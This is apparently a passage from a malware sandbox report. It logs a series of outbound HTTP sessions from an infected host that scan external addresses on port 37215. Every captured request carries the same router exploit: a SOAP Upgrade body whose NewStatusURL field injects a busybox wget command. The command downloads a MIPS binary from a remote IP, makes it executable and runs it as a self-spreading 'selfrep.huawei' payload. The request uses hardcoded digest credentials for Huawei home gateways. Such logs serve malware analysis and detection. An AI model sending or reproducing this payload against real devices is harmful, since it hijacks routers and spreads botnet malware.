69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  623192.168.2.1342858157.245.191.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335480928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  624192.168.2.1341452132.167.180.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335510015 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  625192.168.2.1345266157.46.107.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335536003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  626192.168.2.1346304197.141.113.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335689068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  627192.168.2.1341578157.76.209.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335705996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  628192.168.2.1358394157.116.101.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335725069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  629192.168.2.1334126157.109.13.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335742950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  630192.168.2.1335686197.198.30.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335760117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  631192.168.2.134442277.164.117.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335782051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  632192.168.2.1350044157.156.191.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335798025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  633192.168.2.1343284192.19.183.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.335819960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
